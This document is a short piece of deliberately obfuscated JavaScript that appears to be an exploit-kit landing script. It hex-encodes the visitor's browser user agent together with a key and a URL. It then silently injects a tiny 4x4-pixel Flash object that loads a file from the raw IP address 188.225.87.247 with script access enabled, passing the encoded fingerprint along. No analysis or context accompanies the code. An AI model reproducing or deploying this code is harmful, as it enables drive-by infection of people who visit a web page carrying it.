/*s2545d21768hssfj69913fs*/function hgfgerdfgdf(num, width){/*s9668d77917hfj87352fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s60383d9570hfj73801fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s38898d26868hfj57856fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s84285d92864hfj76397fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd96677hfs*/c += b + d;/*s94723d13109hfj78105fs*/e += 1;}return c;}/*s13052dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://188.225.87.247/?MTA3ODg0MDgz&newest=xHzQMrDYbR7FFYDfKPrEUKREMU7WA0eKwYyZhazVF5yxFDTGpbL1Fx_spV-dCF-EmvJvdLAHIwKh1UfASwR&information=MjYwNzU5MDE=&round=mmIxfUVhB9Kur3UCEyBfJ1JbU9BTeaAsQqZOdHLM70V-mybARIsp1xhSGvGBWn-stWlsZ4AgUn6_7VaOO-w&before=MzQwNjIwODc=", ghnvbn("http://188.225.87.247/?ODQyMzIwMDg=&information=NDM1MDI3MzM=&newest=xHzQMrDYbR7FFYDfKPrEUKREMU7WA0SKwYyZha_VF5-xFDfGpbL1Fx_spV-dCF-EmvJvdLAHIwGh1UfASwR&round=mmI9fUVhB9Kir3UOEyBTJ1JbU9BTeaAgQqZCdHLA70V-mybARIsl1xhSGvGBWn-gtU1gS4Agam6z7S6OJrg&around=NDcxOTE4MjM=","gexywoaxor"));